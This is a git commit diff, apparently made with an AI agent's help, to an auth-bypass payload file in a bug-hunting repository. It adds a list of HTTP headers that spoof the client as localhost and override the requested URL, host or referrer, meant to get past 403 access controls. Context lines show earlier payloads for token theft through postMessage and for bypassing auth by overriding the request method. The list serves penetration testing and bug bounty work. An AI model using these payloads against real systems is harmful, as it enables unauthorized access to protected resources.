Add 403 bypass headers section to auth-bypass-payloads.txt

Agent-Logs-Url: https://github.com/Stalin-143/hunting/sessions/823d004f-3e95-4ad8-a658-cc4433725846 Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 11:35:51 +00:00 · 2026-04-08 18:06:46 +00:00
parent 91477ae7a3
commit 58af4e9e65
1 changed files with 51 additions and 0 deletions
@@ -451,3 +451,54 @@ postMessage({type:'auth',token:'admin_token'}, '*')
 X-HTTP-Method-Override: GET
 X-Method-Override: GET
 # Change POST to GET to bypass CSRF and auth checks
+
+# ============================================
+# 403 BYPASS HEADERS
+# ============================================
+
+# IP spoofing / access control bypass headers
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-For-Original: 127.0.0.1
+X-Forward-For: 127.0.0.1
+X-Forwarder-For: 127.0.0.1
+X-Forwarded: 127.0.0.1
+X-Forwarded-By: 127.0.0.1
+X-Forwarded-Host: 127.0.0.1
+X-Forwarded-Server: 127.0.0.1
+X-Forwarded-Scheme: https
+X-Forwarded-Scheme: http
+X-Forwarded-Port: 80
+X-Forwarded-Port: 443
+X-Forwarded-Port: 8080
+X-Forwarded-Port: 8443
+X-Client-IP: 127.0.0.1
+X-Real-Ip: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Original-Remote-Addr: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-True-IP: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+Client-IP: 127.0.0.1
+Real-Ip: 127.0.0.1
+
+# URL / host override headers
+X-Original-Url: 127.0.0.1
+X-Rewrite-Url: 127.0.0.1
+X-Http-Host-Override: 127.0.0.1
+X-Http-Destinationurl: 127.0.0.1
+X-Host: 127.0.0.1
+X-Proxy-Url: 127.0.0.1
+Proxy-Url: 127.0.0.1
+Proxy-Host: 127.0.0.1
+Http-Url: 127.0.0.1
+Base-Url: 127.0.0.1
+Url: 127.0.0.1
+Uri: 127.0.0.1
+Request-Uri: 127.0.0.1
+Redirect: 127.0.0.1
+
+# Referer / referrer spoofing
+Referer: 127.0.0.1
+Referrer: 127.0.0.1
+Refferer: 127.0.0.1